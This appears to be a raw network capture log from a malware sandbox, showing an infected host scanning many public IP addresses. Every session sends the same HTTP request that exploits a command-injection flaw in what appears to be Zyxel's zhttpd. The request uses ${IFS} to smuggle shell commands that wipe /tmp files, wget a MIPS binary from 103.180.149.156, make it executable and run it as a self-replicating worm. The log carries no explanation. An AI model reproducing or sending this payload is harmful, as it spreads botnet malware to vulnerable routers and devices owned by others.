                                                      Feb 2, 2024 06:35:51.601156950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3987192.168.2.145636446.146.11.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601210117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3988192.168.2.1440372110.132.111.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601253986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3989192.168.2.143651238.167.183.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601315022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3990192.168.2.145216453.145.58.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601349115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3991192.168.2.1434688204.56.6.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601372004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3992192.168.2.143515284.215.113.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601413012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3993192.168.2.1455080136.160.93.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601452112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3994192.168.2.144669474.57.240.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601496935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3995192.168.2.1453004115.214.91.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601530075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3996192.168.2.1454548149.224.63.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601582050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3997192.168.2.1446434185.143.112.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601623058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3998192.168.2.1457664150.41.45.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601664066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3999192.168.2.143443024.115.91.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601694107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4000192.168.2.1437912137.23.31.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601748943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4001192.168.2.1460392170.78.14.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601802111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4002192.168.2.1457124197.162.92.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601829052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4003192.168.2.1442202191.254.248.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601870060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4004192.168.2.143285061.246.208.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601931095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4005192.168.2.144159898.248.175.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.601979017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4006192.168.2.1448288171.206.79.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602010965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4007192.168.2.1440362167.183.175.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602070093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4008192.168.2.1459308210.85.251.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602119923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4009192.168.2.143750420.125.63.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602173090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4010192.168.2.144339673.79.115.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602224112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4011192.168.2.1445514199.200.156.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602273941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4012192.168.2.1456674200.141.2.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602299929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4013192.168.2.1438128123.144.110.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602341890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4014192.168.2.1441078175.250.168.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602394104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4015192.168.2.145069832.26.154.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602447987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4016192.168.2.1446480111.58.176.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602463961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4017192.168.2.144850085.12.138.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602523088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4018192.168.2.1440206181.123.60.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602546930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4019192.168.2.1444838163.61.5.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602590084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4020192.168.2.1451050156.214.192.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602628946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4021192.168.2.1436866147.235.241.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602663040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4022192.168.2.144097493.185.154.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602708101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4023192.168.2.1435310151.156.151.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602746964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4024192.168.2.144585483.3.80.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602773905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4025192.168.2.145862279.105.169.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602818012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4026192.168.2.144798819.69.247.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602861881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4027192.168.2.1458926221.102.5.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602895021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4028192.168.2.144529839.109.176.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602951050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4029192.168.2.1434668216.224.67.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.602998972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4030192.168.2.144280612.122.170.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603025913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4031192.168.2.143403013.44.184.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603063107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4032192.168.2.144192819.10.15.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603113890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4033192.168.2.145245243.14.142.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603142977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4034192.168.2.1447308132.66.33.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603179932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4035192.168.2.144866494.188.141.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603231907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4036192.168.2.144498250.195.200.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603254080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4037192.168.2.1454502100.209.47.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603291988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4038192.168.2.146007413.17.149.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603327036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4039192.168.2.145605812.248.88.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603347063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4040192.168.2.1451426124.38.166.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603373051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4041192.168.2.145978870.7.201.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603425026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4042192.168.2.144939845.84.246.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603465080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4043192.168.2.14580584.4.27.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603504896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4044192.168.2.1436092117.9.85.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603555918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4045192.168.2.145809437.125.60.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603599072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4046192.168.2.1450904116.181.211.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603641987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4047192.168.2.143741493.69.144.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603684902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4048192.168.2.145604691.250.233.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603753090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4049192.168.2.1449056146.131.153.91443
                                                      TimestampBytes transferredDirectionData
